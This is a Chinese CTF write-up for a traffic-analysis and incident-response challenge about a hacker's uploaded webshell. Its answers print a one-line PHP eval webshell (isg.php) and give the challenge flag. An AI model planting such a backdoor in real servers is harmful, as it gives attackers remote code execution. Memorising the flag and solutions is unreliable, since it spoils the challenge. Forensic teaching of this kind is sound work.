流量分析, 应急响应, Webshell, 信安一把梭Tags:流量分析, 应急响应, Webshell, 信安一把梭
0x00. 题目
流量包描述:可恶的黑客,在我的电脑上传了几个奇怪的文件,老师教了我排查但是我没学会,但是我认识大佬你,请你帮我排查一下,谢谢大佬
任务需求如下:
-
黑客一句话木马的加密方式
-
找到黑客上传的文件名字
-
获取文件的内容
附件路径:https://pan.baidu.com/s/1GyH7kitkMYywGC9YJeQLJA?pwd=Zmxh#list/path=/CTF附件
附件名称:20250806_信安一把梭_test.zip
0x01. WP
1. 黑客一句话木马的加密方式
从脚本代码中可知,加密方式为base64
2. 找到黑客上传的文件名字
落地文件名为isg.php
3. 获取文件的内容
文件内容为<?php @eval($_POST['ISG2014']);?>
4. 彩蛋
最后还请求了/var/www/html/x.tar.gz文件,去除头尾标志位字符后另存解压,里面还隐藏了一个flag
ISG{China_Ch0pper_Is_A_Slick_Little_Webshe11}
